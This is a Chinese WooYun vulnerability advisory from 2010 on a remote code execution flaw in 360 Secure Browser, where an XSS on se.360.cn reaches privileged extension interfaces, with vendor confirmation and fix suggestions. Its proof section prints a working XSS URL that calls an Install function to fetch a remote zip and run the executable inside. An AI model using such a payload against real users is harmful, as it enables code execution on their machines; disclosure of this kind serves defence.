当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-020

漏洞标题:360安全浏览器远程代码执行漏洞

相关厂商:奇虎360

漏洞作者: 结界师

提交时间:2010-07-15 12:24

修复时间:2010-08-18 16:37

公开时间:2010-08-18 16:37

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-07-15: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

360安全浏览器(360SE)是互联网上好用、安全的新一代浏览器,和360安全卫士、360杀毒等软件等产品一同成为360安全中心的系列产品,官方网站在http://se.360.cn。
在360浏览器中存在一个设计上的问题,结合一些其他的漏洞可能导致远程代码执行。

详细说明:

360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为se.360.cn才可以调用这些接口。
通过在se.360.cn网站中漏洞的查找,通过一个xss可以跨越这个边界,从而直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

漏洞证明:

http://se.360.cn/v3/guide/guide_start.htm?ver=3.1.0.8&firstcheck=1&1="><iframe name="fuck" src="http://se.360.cn/v3/plugins.htm" onload=alert(fuck.window.eval("Install('ExtWebMail','1.1.0.1013','360邮件通','http://www.wooyun.org/ExtWebmail.zip','3.1.0.8')"))></iframe>
其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

修复方案:

1 修复xss(无法解决se.360.cn的其他安全问题)
2 验证程序的来源(无法解决其他接口的问题)

版权声明:转载请注明来源 结界师@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:17

确认时间:2010-07-15 12:24

厂商回复:

该漏洞已经修复,感谢wooyun对360浏览器的支持。
由于该漏洞需在特定场景下才能被利用,因此危害等级为:中

最新状态:

暂无